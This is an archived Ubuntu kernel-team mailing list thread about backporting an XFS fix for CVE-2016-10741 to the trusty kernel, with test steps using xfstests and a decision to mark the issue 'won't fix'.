NACK: [SRU][T][PATCH 0/1] CVE-2016-10741 - Local DoS in XFS

Tyler Hicks tyhicks at canonical.com
Fri Feb 22 10:05:16 UTC 2019 

On 2019-02-21 18:23:45, Hui Wang wrote:
> On 2019/2/20 下午11:06, Tyler Hicks wrote:
> > On 2019-02-20 22:53:29, Hui Wang wrote:
> > > On 2019/2/19 下午8:48, Tyler Hicks wrote:
> > > > On 2019-02-19 19:32:56, Hui Wang wrote:
> > > > > https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-10741.html
> > > > > 
> > > > > In the Linux kernel before 4.9.3, fs/xfs/xfs_aops.c allows local users to
> > > > > cause a denial of service (system crash) because there is a race condition
> > > > > between direct and memory-mapped I/O (associated with a hole) that is
> > > > > handled with BUG_ON instead of an I/O failure.
> > > > > 
> > > > > This issue is only for trusty kernel. The original patch context is different
> > > > > from the trusty kernel, I backported this patch rather than cherry-picked.
> > > > > 
> > > > > I think the backport is safe since the logic is same as the original
> > > > > patch (if there are  both direct and mapped-IO access for a file at the same
> > > > > time, don't BUG_ON() unconditionally, instead we will return EIO or
> > > > > WARN_ON_ONCE() conditionally).
> > > > > 
> > > > > building test pass.
> > > > > 
> > > > > I generated a xfs filesytem based on a file (dd, mount and mkfs.xfs) and did
> > > > > some basic file operations (generate a new file, write sth in
> > > > > this file, read out from this file, delete this file), everthing
> > > > > works fine as before.
> > > > Thanks for working on this fix. Would you be able to run the test
> > > > mentioned in the commit message of the fix?
> > > > 
> > > >     https://git.kernel.org/pub/scm/fs/xfs/xfstests-dev.git/tree/tests/generic/095
> > > > 
> > > > Thanks!
> > > I ran the test case above under the original trusty kernel, could not
> > > reproduce the issue (trigger the BUG_ON(1)) . And after running the test
> > > case, it will hang somewhere, but I can confirm the hang is not related to
> > > this cve, since when it hangs, it is not in the function of
> > > __xfs_get_blocks(),  and I tested 3.16 and 3.19 kernel (they all have this
> > > cve issue), they all don't hang and can't trigger the BUG_ON(1) in the
> > > __xfs_get_blocks().
> > Can you clarify if the test hangs in these situations:
> > 
> > 1) without your backport applied
> > 2) with your backport applied
> > 
> > Tyler
> 
> Apart from this CVE issue, It looks like that the trusty kernel also has
> other bugs in the fs/xfs for generic/095, and other bugs are always
> triggered and make the system hang ahead of this CVE issue being triggered
> when running generic/095, then I have no ways to verify the backported
> patch.
> 
> Let us set this CVE issue to be "won't fix" in the trusty kernel?

Yes, I think that's a good idea. This CVE isn't severe enough to warrant
more research at this time.

Tyler

> 
> 
> Regards,
> 
> Hui.
> 
> 
> 
> > > The test steps I did:
> > > 
> > > boot a trusty linux in the kvm
> > > 
> > > dd if=/dev/zero of=./test1.img bs=1M count=100
> > > mkfs.xfs ./test1.img
> > > sudo losetup /dev/loop1 ./test1.img
> > > 
> > >   dd if=/dev/zero of=./test.img bs=1M count=100
> > >   mkfs.xfs ./test.img
> > > sudo losetup /dev/loop0 ./test.img
> > > 
> > > sudo su
> > > 
> > > export TEST_DIR=/mnt
> > > export TEST_DEV=/dev/loop1
> > > export SCRATCH_MNT=/scrat
> > > export SCRATCH_DEV=/dev/loop0
> > > 
> > > /var/lib/xfstests/check generic/095
> > > 
> > > 
> > > > Tyler
> > > > 
> > > > > Brian Foster (1):
> > > > >     xfs: don't BUG() on mixed direct and mapped I/O
> > > > > 
> > > > >    fs/xfs/xfs_aops.c | 21 ++++++++++++++++++++-
> > > > >    1 file changed, 20 insertions(+), 1 deletion(-)
> > > > > 
> > > > > -- 
> > > > > 2.17.1
> > > > > 
> > > > > 
> > > > > -- 
> > > > > kernel-team mailing list
> > > > > kernel-team at lists.ubuntu.com
> > > > > https://lists.ubuntu.com/mailman/listinfo/kernel-team
> > > 
>

More information about the kernel-team mailing list